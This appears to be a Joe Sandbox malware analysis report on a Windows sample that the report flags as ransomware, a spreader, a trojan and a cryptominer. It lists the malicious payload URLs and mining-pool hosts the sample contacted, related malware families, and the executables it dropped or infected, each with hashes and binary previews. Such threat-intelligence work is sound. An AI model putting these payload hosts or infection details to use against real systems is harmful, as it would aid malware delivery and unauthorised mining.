http://ddos.dnsnb8.net:799/cj//k1.rarqT	VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net/	VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.75.158.61	auto.c3pool.org	Germany	24940	HETZNER-ASDE	true
5.161.70.189	unknown	Germany	24940	HETZNER-ASDE	true
44.221.84.105	ddos.dnsnb8.net	United States	14618	AMAZON-AESUS	false
88.198.117.174	unknown	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481620
Start date and time:	2024-07-25 11:58:33 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002B_48.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.evad.mine.winEXE@14/19@67/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 32 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target svchost.exe, PID 6848 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
VT rate limit hit for: LisectAVT_2403002B_48.exe

Simulations

Behavior and APIs

Time	Type	Description
05:59:28	API Interceptor	1303x Sleep call for process: SGuard.exe modified
06:00:11	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5.75.158.61	LisectAVT_2403002B_55.exe	Get hash	malicious	Xmrig	Browse
5.75.158.61	LisectAVT_2403002A_416.exe	Get hash	malicious	Xmrig	Browse
5.161.70.189	4xHN38uqxB.exe	Get hash	malicious	DoublePulsar, ETERNALBLUE, Xmrig	Browse
5.161.70.189	logor.elf	Get hash	malicious	Xmrig	Browse
44.221.84.105	LisectAVT_2403002B_470.exe	Get hash	malicious	Bdaejec, Petya, ReflectiveLoader	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_482.exe	Get hash	malicious	Bdaejec, Raccoon	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_498.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_498.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	LisectAVT_2403002B_50.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_61.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_65.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_72.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_7.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_72.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar
88.198.117.174	o00DuIdf3j.exe	Get hash	malicious	Xmrig	Browse
	o00DuIdf3j.exe	Get hash	malicious	Xmrig	Browse
	xB6r0wPRyb.exe	Get hash	malicious	Xmrig	Browse
	c3p.exe	Get hash	malicious	Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
auto.c3pool.org	LisectAVT_2403002B_55.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	LisectAVT_2403002A_416.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	o00DuIdf3j.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	o00DuIdf3j.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	xB6r0wPRyb.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	K4gsPJGEi4.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	x00zm3KVwb.exe	Get hash	malicious	Xmrig	Browse	88.198.117.174
	4xHN38uqxB.exe	Get hash	malicious	DoublePulsar, ETERNALBLUE, Xmrig	Browse	5.161.70.189
	UO2z4n1Sxx.exe	Get hash	malicious	Unknown	Browse	88.198.117.174
	4xHN38uqxB.exe	Get hash	malicious	Xmrig	Browse	88.198.117.174
ddos.dnsnb8.net	LisectAVT_2403002B_470.exe	Get hash	malicious	Bdaejec, Petya, ReflectiveLoader	Browse	44.221.84.105
	LisectAVT_2403002B_482.exe	Get hash	malicious	Bdaejec, Raccoon	Browse	44.221.84.105
	LisectAVT_2403002B_498.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_498.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_50.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_61.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_65.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	44.221.84.105
	LisectAVT_2403002B_72.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_7.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_72.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	LisectAVT_2403002B_470.exe	Get hash	malicious	Bdaejec, Petya, ReflectiveLoader	Browse	44.221.84.105
	LisectAVT_2403002B_482.exe	Get hash	malicious	Bdaejec, Raccoon	Browse	44.221.84.105
	LisectAVT_2403002B_498.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	arm7.elf	Get hash	malicious	Mirai	Browse	54.34.104.231
	LisectAVT_2403002B_498.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_50.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_61.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_65.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	44.221.84.105
	LisectAVT_2403002B_72.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_7.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
HETZNER-ASDE	LisectAVT_2403002B_51.exe	Get hash	malicious	Unknown	Browse	116.203.169.153
	LisectAVT_2403002B_486.exe	Get hash	malicious	RedLine	Browse	135.181.235.186
	LisectAVT_2403002B_51.exe	Get hash	malicious	Unknown	Browse	116.203.169.153
	LisectAVT_2403002B_55.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	LisectAVT_2403002B_59.dll	Get hash	malicious	Emotet	Browse	78.47.204.80
	LisectAVT_2403002C_119.exe	Get hash	malicious	Bdaejec, Sodinokibi	Browse	159.69.118.212
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	95.217.240.177
	LisectAVT_2403002C_47.exe	Get hash	malicious	SmokeLoader	Browse	188.40.141.211
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	128.140.125.116
	Q2XwE8NRLx.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
HETZNER-ASDE	LisectAVT_2403002B_51.exe	Get hash	malicious	Unknown	Browse	116.203.169.153
	LisectAVT_2403002B_486.exe	Get hash	malicious	RedLine	Browse	135.181.235.186
	LisectAVT_2403002B_51.exe	Get hash	malicious	Unknown	Browse	116.203.169.153
	LisectAVT_2403002B_55.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	LisectAVT_2403002B_59.dll	Get hash	malicious	Emotet	Browse	78.47.204.80
	LisectAVT_2403002C_119.exe	Get hash	malicious	Bdaejec, Sodinokibi	Browse	159.69.118.212
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	95.217.240.177
	LisectAVT_2403002C_47.exe	Get hash	malicious	SmokeLoader	Browse	188.40.141.211
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	128.140.125.116
	Q2XwE8NRLx.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
HETZNER-ASDE	LisectAVT_2403002B_51.exe	Get hash	malicious	Unknown	Browse	116.203.169.153
	LisectAVT_2403002B_486.exe	Get hash	malicious	RedLine	Browse	135.181.235.186
	LisectAVT_2403002B_51.exe	Get hash	malicious	Unknown	Browse	116.203.169.153
	LisectAVT_2403002B_55.exe	Get hash	malicious	Xmrig	Browse	5.75.158.61
	LisectAVT_2403002B_59.dll	Get hash	malicious	Emotet	Browse	78.47.204.80
	LisectAVT_2403002C_119.exe	Get hash	malicious	Bdaejec, Sodinokibi	Browse	159.69.118.212
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	95.217.240.177
	LisectAVT_2403002C_47.exe	Get hash	malicious	SmokeLoader	Browse	188.40.141.211
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	128.140.125.116
	Q2XwE8NRLx.exe	Get hash	malicious	Quasar	Browse	195.201.57.90

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\VSFdoO.exe	LisectAVT_2403002B_470.exe	Get hash	malicious	Bdaejec, Petya, ReflectiveLoader	Browse
	LisectAVT_2403002B_482.exe	Get hash	malicious	Bdaejec, Raccoon	Browse
	LisectAVT_2403002B_498.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_498.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_50.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_61.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_65.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse
	LisectAVT_2403002B_72.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_7.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_72.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Process:	C:\Users\user\AppData\Local\Temp\VSFdoO.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590704438552131
Encrypted:	false
SSDEEP:	384:1FqSXXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:7ZQGPL4vzZq2o9W7GsxBbPr
MD5:	1DDC01915581FBBB26ADA5DE1F5A4579
SHA1:	BFE4CF63B11F1CBA48250D27AA5EA7B895DB12E7
SHA-256:	B05A3C462B6B96FC5A782D165F004759FBB2BA3EDCEA36E5B348DC03F7ECE92D
SHA-512:	C0088E6781DE09EBCA0F72EB9C05C329D71428520D2F682292AD97EA64F996DEAFD34F0B0038159E5C8D0A455ACF75183ECF4C3995221CE7700D8435436A88E0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Process:	C:\Users\user\AppData\Local\Temp\VSFdoO.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.731347997143091
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	E52B8B08EB2869AAE73852D3DA9EE9FF
SHA1:	C06D171EB3826E6CA394CBBEE44EE8E3A495B3B9
SHA-256:	E7E0F5D9B8DECB3DF6D94CD9BEB7653A5662464E68372F43071FF829210342B7
SHA-512:	9A024DDA5B5580E4DFA9D0CF141A779E200A57E553346E3B0B2A1C9D86621E81E3B72361DC109EE7A6A3C7D6F697DDB3964C7E00E5D036B6CDA8DA8FCD5BF91B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Process:	C:\Users\user\AppData\Local\Temp\VSFdoO.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366925459370854
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdfgQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdfrGCq2iW7z
MD5:	DC0FE5F7C6B9D2F6E5114F9456EA7C1E
SHA1:	209D11872FA6E6497038D1962CF62635932B37A6
SHA-256:	490B5A327E4EB52E81F230FA5908A0B6CE0987D3E6533C011865D5CF776279A0
SHA-512:	1D2B1DC3D74B56E84A3C4897D2C4145D377F97AF7854F884CF9D3619D9A71EC39F1822910BAF72F02FCCAF44C6DE9C8952789FFEC1B049EE7E3BD2BC2C226884
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VSFdoO.exe_3450214913de9415599cf972caa95c56487d673b_f9e931ed_2652469d-2bbb-4173-a2e9-c9d8e23b427c\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9861253084743543
Encrypted:	false
SSDEEP:	192:Yknubbty0Zuwpxxj8/AmzuiFHZ24IO89H:bKbt5ZuwZjwzuiFHY4IO89
MD5:	E20DAEED5B6960625A1223DEEDC64671
SHA1:	19CF4F363EBBD55710A7B3B7DD4B685FAD599367
SHA-256:	517EEB31ACAD5D9A88BDC1996B53A5E772CC7BEA9EA94CD7EC1680A5279B29B8
SHA-512:	C68F15DA5A377115BF7239AA5F3779E44B1E11FDB848BDB7915DA29D5ED92BC7F455C2F3F5BC9CCDD47D601F5742462EB4E4C45DB4F6FC7C518E4C598CA16E68
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.7.5.1.7.5.6.9.7.4.0.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.7.5.1.7.8.2.2.8.6.5.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.5.2.4.6.9.d.-.2.b.b.b.-.4.1.7.3.-.a.2.e.9.-.c.9.d.8.e.2.3.b.4.2.7.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.1.5.d.f.1.a.-.1.b.2.b.-.4.b.4.a.-.8.9.1.3.-.a.9.3.0.9.7.6.6.5.d.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.S.F.d.o.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.0.c.-.0.0.0.1.-.0.0.1.4.-.b.4.0.5.-.5.0.5.5.7.9.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.e.5.1.f.a.6.6.9.f.b.0.8.2.a.7.c.1.7.d.6.2.a.b.7.8.f.6.3.a.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.V.S.F.d.o.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C31.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jul 25 09:59:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	158326
Entropy (8bit):	1.880228198198758
Encrypted:	false
SSDEEP:	768:FN7S9eVB9rh+12Tdw5sKfIq19CJRaTDS3:FN7SY7+1c25sKfIneS
MD5:	BB0341927507D0A9952FC478A1592455
SHA1:	E3962B7F1F396D2987E86AFFDF9F2863769DE30C
SHA-256:	559AAB39C90D38CD66A99DC5028911F0FBD208EB070CCCE341320DE7ED638404
SHA-512:	676D2E37D7874F17BAC86DDBE7A9BC4F291D87D59B1C33C004CDA0DC74D4FED31638A9FEF95F7C76521246398A617DEE0108673F8ED801AF7958D6106F5EB59C
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........".f............t...............\|...........hQ..........T.......8...........T............;.............. !...........#..............................................................................eJ.......#......GenuineIntel............T............!.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER32C9.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6272
Entropy (8bit):	3.7193079222702745
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbYI6lqY2TpqKe5aMQUT89b3bsfnsudm:R6l7wVeJYI6lqY2EpDT89b3bsfnjdm
MD5:	E90B2356997092C2392D7BF8FCAECB0F
SHA1:	576AE2C4D265E75BF15A25EDA0964F1924D85F9C
SHA-256:	803F50C03E183F65968FDCFC649E342EDABE089E794774F3B08834AACB20857D
SHA-512:	E8C219A7DE2491FE7DFA6AC10EFD67EDEFBB62B6A1CBA7FCA377612D5D5E09C9FF0A0F19DE03B535F0AE075F257B9315BCB8E1B4BEF633BDB22232C6C0AEBD2F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER32F9.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.454677236908679
Encrypted:	false
SSDEEP:	48:cvIwWl8zsfNJg77aI9Q7WpW8VYbYm8M4JQQFE+q8yCt2gYhdd:uIjffnI76K7VPJMyt2gYhdd
MD5:	8DD6F128A103B98F48C67D907FEC12C3
SHA1:	EBB4217B53ED76C8001BCD2DBBD3D80E3C16292F
SHA-256:	A4FEF16E61465F878AEF0D3A2366C133F63B613C318D3DE6B7446A14B1234757
SHA-512:	586EE1490F49146C59B07A097C7080F29335A2646C7784E7F26CAEAC0C5540A15EF9914DC31A45D78D3EAA01F00A8460AADC5803D49D9B48A072CC8FA6E39334
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426302" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3307.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80842
Entropy (8bit):	3.0782944694071652
Encrypted:	false
SSDEEP:	768:di5cuso8szd0FgW2hz4OAQUd8WxgaK2R1jpyOLhbZV5R08iwSGB7:wC28o0FgW2hznE8W5K2R5j1br5R0rhw
MD5:	D2FB00876F18C38DC2F316CD115B23B4
SHA1:	1162CC797C39EFCE96F732138B5492664D7CE6AE
SHA-256:	3DE6B7B77265539D11D683BF9E2929AB24B97554045EA3A0CD5A327B1CA691C4
SHA-512:	589725DC61EA10708BCBFBF58A73E263CE37ADA3BF69B6CD5226DDCB7AE924CF9F9632A1E0C4EB8044E0E869B8E7541E958F4C23A8839957380F9AF3954B8645
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER33E2.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685816947315613
Encrypted:	false
SSDEEP:	96:TiZYWnxCgXb0TYRYDW8HhUYEZQEtEip4mytw7zbd/nah8kMj4tIXh13:2ZDxumC6/Nnah8kMj4yXD3
MD5:	228C8ABE870DB7561C51B32CCECBECA6
SHA1:	F309E06779536FAD12CD502F205358EB3A563D85
SHA-256:	80B6C80DEEA6C05A0BC3F72D5DE05E7F6A76C3505BD81ADB4B5BCA0C3D934E16
SHA-512:	AB30347F17AEF9C2F0E822B29E7F9F5EE2507297403131E58383CC40295EE66620ED95DCD7516BCBE50951919F4722DAEDC1EA7E7BCC6CF93B3E20CF90E76BFB
Malicious:	false
